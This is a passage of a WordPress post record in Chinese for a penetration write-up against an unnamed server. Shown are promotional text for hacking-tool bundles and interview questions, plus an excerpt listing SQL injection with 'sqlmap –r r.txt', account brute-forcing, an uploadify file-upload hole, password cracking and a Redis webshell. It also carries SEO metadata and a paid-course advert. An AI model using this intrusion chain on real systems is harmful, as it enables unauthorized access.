\u6280\u672f\u6587\u6863\u4e5f\u662f\u6211\u81ea\u5df1\u6574\u7406\u7684&#xff0c;\u5305\u62ec\u6211\u53c2\u52a0\u5927\u578b\u7f51\u5b89\u884c\u52a8\u3001CTF\u548c\u6316SRC\u6f0f\u6d1e\u7684\u7ecf\u9a8c\u548c\u6280\u672f\u8981\u70b9&#xff0c;\u7535\u5b50\u4e66\u4e5f\u6709200\u591a\u672c&#xff0c;\u7531\u4e8e\u5185\u5bb9\u7684\u654f\u611f\u6027&#xff0c;\u6211\u5c31\u4e0d\u4e00\u4e00\u5c55\u793a\u4e86\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fbdd3a9.png\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>\u56e0\u7bc7\u5e45\u6709\u9650&#xff0c;\u4ec5\u5c55\u793a\u90e8\u5206\u8d44\u6599&#xff0c;\u9700\u8981\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fbba8e9.bmp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>&#x1f435;\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6&#xff0c;\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6&#x1f449;:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90<\/p>\n<p>4.\u5de5\u5177\u5305\u3001\u9762\u8bd5\u9898\u548c\u6e90\u7801 \u201c\u5de5\u6b32\u5584\u5176\u4e8b\u5fc5\u5148\u5229\u5176\u5668\u201d\u6211\u4e3a\u5927\u5bb6\u603b\u7ed3\u51fa\u4e86\u6700\u53d7\u6b22\u8fce\u7684\u51e0\u5341\u6b3e\u6b3e\u9ed1\u5ba2\u5de5\u5177\u3002\u6d89\u53ca\u8303\u56f4\u4e3b\u8981\u96c6\u4e2d\u5728 \u4fe1\u606f\u6536\u96c6\u3001Android\u9ed1\u5ba2\u5de5\u5177\u3001\u81ea\u52a8\u5316\u5de5\u5177\u3001\u7f51\u7edc\u9493\u9c7c\u7b49&#xff0c;\u611f\u5174\u8da3\u7684\u540c\u5b66\u4e0d\u5bb9\u9519\u8fc7\u3002<\/p>\n<p>\u8fd8\u6709\u6211\u89c6\u9891\u91cc\u8bb2\u7684\u6848\u4f8b\u6e90\u7801\u548c\u5bf9\u5e94\u7684\u5de5\u5177\u5305&#xff0c;\u9700\u8981\u7684\u8bdd\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fbba8e9.bmp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>&#x1f435;\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6&#xff0c;\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6&#x1f449;:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90<\/p>\n<p>\u6700\u540e\u5c31\u662f\u6211\u8fd9\u51e0\u5e74\u6574\u7406\u7684\u7f51\u5b89\u65b9\u9762\u7684\u9762\u8bd5\u9898&#xff0c;\u5982\u679c\u4f60\u662f\u8981\u627e\u7f51\u5b89\u65b9\u9762\u7684\u5de5\u4f5c&#xff0c;\u5b83\u4eec\u7edd\u5bf9\u80fd\u5e2e\u4f60\u5927\u5fd9\u3002<\/p>\n<p>\u8fd9\u4e9b\u9898\u76ee\u90fd\u662f\u5927\u5bb6\u5728\u9762\u8bd5\u6df1\u4fe1\u670d\u3001\u5947\u5b89\u4fe1\u3001\u817e\u8baf\u6216\u8005\u5176\u5b83\u5927\u5382\u9762\u8bd5\u65f6\u7ecf\u5e38\u9047\u5230\u7684&#xff0c;\u5982\u679c\u5927\u5bb6\u6709\u597d\u7684\u9898\u76ee\u6216\u8005\u597d\u7684\u89c1\u89e3\u6b22\u8fce\u5206\u4eab\u3002<\/p>\n<p>\u53c2\u8003\u89e3\u6790&#xff1a;\u6df1\u4fe1\u670d\u5b98\u7f51\u3001\u5947\u5b89\u4fe1\u5b98\u7f51\u3001Freebuf\u3001csdn\u7b49<\/p>\n<p>\u5185\u5bb9\u7279\u70b9&#xff1a;\u6761\u7406\u6e05\u6670&#xff0c;\u542b\u56fe\u50cf\u5316\u8868\u793a\u66f4\u52a0\u6613\u61c2\u3002<\/p>\n<p>\u5185\u5bb9\u6982\u8981&#xff1a;\u5305\u62ec \u5185\u7f51\u3001\u64cd\u4f5c\u7cfb\u7edf\u3001\u534f\u8bae\u3001\u6e17\u900f\u6d4b\u8bd5\u3001\u5b89\u670d\u3001\u6f0f\u6d1e\u3001\u6ce8\u5165\u3001XSS\u3001CSRF\u3001SSRF\u3001\u6587\u4ef6\u4e0a\u4f20\u3001\u6587\u4ef6\u4e0b\u8f7d\u3001\u6587\u4ef6\u5305\u542b\u3001XXE\u3001\u903b\u8f91\u6f0f\u6d1e\u3001\u5de5\u5177\u3001SQLmap\u3001NMAP\u3001BP\u3001MSF\u2026<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043052-680db2fc61d93.png\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>\u56e0\u7bc7\u5e45\u6709\u9650&#xff0c;\u4ec5\u5c55\u793a\u90e8\u5206\u8d44\u6599&#xff0c;\u9700\u8981\u89c1\u4e0b\u56fe\u5373\u53ef\u524d\u5f80\u83b7\u53d6 <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043051-680db2fbba8e9.bmp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>&#x1f435;\u8fd9\u4e9b\u4e1c\u897f\u6211\u90fd\u53ef\u4ee5\u514d\u8d39\u5206\u4eab\u7ed9\u5927\u5bb6&#xff0c;\u9700\u8981\u7684\u53ef\u4ee5\u70b9\u8fd9\u91cc\u81ea\u53d6&#x1f449;:\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u8d44\u6e90 \u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014<\/p>\n<p>\u7248\u6743\u58f0\u660e&#xff1a;\u672c\u6587\u4e3a\u535a\u4e3b\u539f\u521b\u6587\u7ae0&#xff0c;\u9075\u5faa CC 4.0 BY-SA \u7248\u6743\u534f\u8bae&#xff0c;\u8f6c\u8f7d\u8bf7\u9644\u4e0a\u539f\u6587\u51fa\u5904\u94fe\u63a5\u548c\u672c\u58f0\u660e\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb803\u6b21\uff0c\u70b9\u8d5e21\u6b21\uff0c\u6536\u85cf25\u6b21\u3002\u672c\u6b21\u6e17\u900f\u7528\u5230\u4e86\u591a\u4e2a\u6280\u672f:1.burpsuite\u6293\u5305\uff0c\u5bf9\u5305\u6587\u4ef6\uff0c\u4f7f\u7528sqlmap\u8fdb\u884c\u6ce8\u5165sqlmap \u2013r r.txt2.\u540e\u53f0\u8d26\u53f7\u7684\u66b4\u529b\u7834\u89e3\uff0c\u901a\u8fc7burpsuite\u5bf9\u8d26\u53f7\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u30023. uploadify\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e4.\u540e\u53f0\u52a0\u5bc6\u6587\u4ef6\u5bc6\u7801\u7b97\u6cd5\u53ca\u5bc6\u7801\u7834\u89e3\u5206\u67905.redis\u6f0f\u6d1e\u83b7\u53d6webshell\u65b9\u6cd56.masscan\u53canmap\u5168\u7aef\u53e3\u626b\u63cf\u53e6\u5916\u63a8\u51fa\u300a\u5b9e\u6218\u4e2d\u768420\u4e2a\u53d6\u8bc1\u6280\u672f\u300b\u89c6\u9891\u8bfe\u7a0b\uff0c\u552e\u4ef7298\u5143\uff0c\u57fa\u672c\u6db5\u76d6\u76ee\u524d\u7684\u6253\u51fb\u53d6\u8bc1\u9700\u8981\uff0c\u53ef\u4ee5\u8054\u7cfb\u5fae\u4fe1lovesec2022\u8d2d\u4e70\u3002<\/p>\n","protected":false},"author":2,"featured_media":33420,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[2390,275,87,61,100,43,958,478,122,44],"topic":[],"class_list":["post-33431","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","tag-okhttp","tag-web","tag-87","tag-61","tag-100","tag-43","tag-958","tag-478","tag-122","tag-44"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/33431.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"\u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb803\u6b21\uff0c\u70b9\u8d5e21\u6b21\uff0c\u6536\u85cf25\u6b21\u3002\u672c\u6b21\u6e17\u900f\u7528\u5230\u4e86\u591a\u4e2a\u6280\u672f:1.burpsuite\u6293\u5305\uff0c\u5bf9\u5305\u6587\u4ef6\uff0c\u4f7f\u7528sqlmap\u8fdb\u884c\u6ce8\u5165sqlmap \u2013r r.txt2.\u540e\u53f0\u8d26\u53f7\u7684\u66b4\u529b\u7834\u89e3\uff0c\u901a\u8fc7burpsuite\u5bf9\u8d26\u53f7\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u30023. uploadify\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e4.\u540e\u53f0\u52a0\u5bc6\u6587\u4ef6\u5bc6\u7801\u7b97\u6cd5\u53ca\u5bc6\u7801\u7834\u89e3\u5206\u67905.redis\u6f0f\u6d1e\u83b7\u53d6webshell\u65b9\u6cd56.masscan\u53canmap\u5168\u7aef\u53e3\u626b\u63cf\u53e6\u5916\u63a8\u51fa\u300a\u5b9e\u6218\u4e2d\u768420\u4e2a\u53d6\u8bc1\u6280\u672f\u300b\u89c6\u9891\u8bfe\u7a0b\uff0c\u552e\u4ef7298\u5143\uff0c\u57fa\u672c\u6db5\u76d6\u76ee\u524d\u7684\u6253\u51fb\u53d6\u8bc1\u9700\u8981\uff0c\u53ef\u4ee5\u8054\u7cfb\u5fae\u4fe1lovesec2022\u8d2d\u4e70\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/33431.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-27T04:30:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f63afd8.jpg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/33431.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/33431.html\",\"name\":\"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2025-04-27T04:30:54+00:00\",\"dateModified\":\"2025-04-27T04:30:54+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/33431.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/33431.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/33431.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/33431.html","og_locale":"zh_CN","og_type":"article","og_title":"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"\u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb803\u6b21\uff0c\u70b9\u8d5e21\u6b21\uff0c\u6536\u85cf25\u6b21\u3002\u672c\u6b21\u6e17\u900f\u7528\u5230\u4e86\u591a\u4e2a\u6280\u672f:1.burpsuite\u6293\u5305\uff0c\u5bf9\u5305\u6587\u4ef6\uff0c\u4f7f\u7528sqlmap\u8fdb\u884c\u6ce8\u5165sqlmap \u2013r r.txt2.\u540e\u53f0\u8d26\u53f7\u7684\u66b4\u529b\u7834\u89e3\uff0c\u901a\u8fc7burpsuite\u5bf9\u8d26\u53f7\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u30023. uploadify\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e4.\u540e\u53f0\u52a0\u5bc6\u6587\u4ef6\u5bc6\u7801\u7b97\u6cd5\u53ca\u5bc6\u7801\u7834\u89e3\u5206\u67905.redis\u6f0f\u6d1e\u83b7\u53d6webshell\u65b9\u6cd56.masscan\u53canmap\u5168\u7aef\u53e3\u626b\u63cf\u53e6\u5916\u63a8\u51fa\u300a\u5b9e\u6218\u4e2d\u768420\u4e2a\u53d6\u8bc1\u6280\u672f\u300b\u89c6\u9891\u8bfe\u7a0b\uff0c\u552e\u4ef7298\u5143\uff0c\u57fa\u672c\u6db5\u76d6\u76ee\u524d\u7684\u6253\u51fb\u53d6\u8bc1\u9700\u8981\uff0c\u53ef\u4ee5\u8054\u7cfb\u5fae\u4fe1lovesec2022\u8d2d\u4e70\u3002","og_url":"https:\/\/www.wsisp.com\/helps\/33431.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2025-04-27T04:30:54+00:00","og_image":[{"url":"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/04\/20250427043046-680db2f63afd8.jpg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"5 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/33431.html","url":"https:\/\/www.wsisp.com\/helps\/33431.html","name":"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2025-04-27T04:30:54+00:00","dateModified":"2025-04-27T04:30:54+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/33431.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/33431.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/33431.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"\u624b\u5de5\u6f0f\u6d1e\u6316\u6398\u6e17\u900f\u67d0\u670d\u52a1\u5668"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/33431","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=33431"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/33431\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media\/33420"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=33431"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=33431"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=33431"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=33431"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}